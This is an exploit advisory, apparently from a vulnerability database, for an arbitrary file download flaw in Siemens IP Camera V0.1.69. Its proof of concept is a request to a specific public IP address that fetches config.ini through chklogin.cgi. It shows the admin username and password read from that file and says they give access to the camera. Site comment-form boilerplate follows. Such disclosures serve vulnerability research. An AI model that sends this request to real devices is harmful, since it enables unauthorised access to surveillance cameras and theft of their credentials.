Siemens IP Camera 0.1.69 Arbitrary File Download

2016.09.15

Credit: vuppala.Dhanunjaya

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

#Exploit Title: Siemens IP Camera :: Arbitrary file download
# Date: [14-september-2016]
# Exploit Author: [vuppala.Dhanunjaya]
# Vendor Homepage: [www.siemens.com]
# Version: [V0.1.69]
# Tested on: [Windows 10,ubuntu 14.04 LTS]
# Email : vuppaladhani@gmail.com

========================================
TEAM 
========================================

Harsha Vardhan (https://www.facebook.com/HarshaHere)
Santosh Kumar  (https://www.facebook.com/M4drob0t)
Akhil Manikanth(https://www.facebook.com/IaMAkIlManIkAnTh)
Manish Yadav   (https://www.facebook.com/spikeymanish)

Thankyou for the support 

========================================
TECHNICAL DETAILS & POC
========================================

Target  : https://78.56.240.235/cgi-bin/chklogin.cgi?rnd=1473849790369

Downloding the config file : cgi-bin/chklogin.cgi?file=config.ini 

https://78.56.240.235/cgi-bin/chklogin.cgi?file=config.ini

this config.ini file contains the username nd password of the administration login

account.admin.user_id=admin
account.admin.password=admin
account.admin.language=english

using this login credentials we can get into the IPcam


Thankyou

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Siemens IP Camera 0.1.69 Arbitrary File Download

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.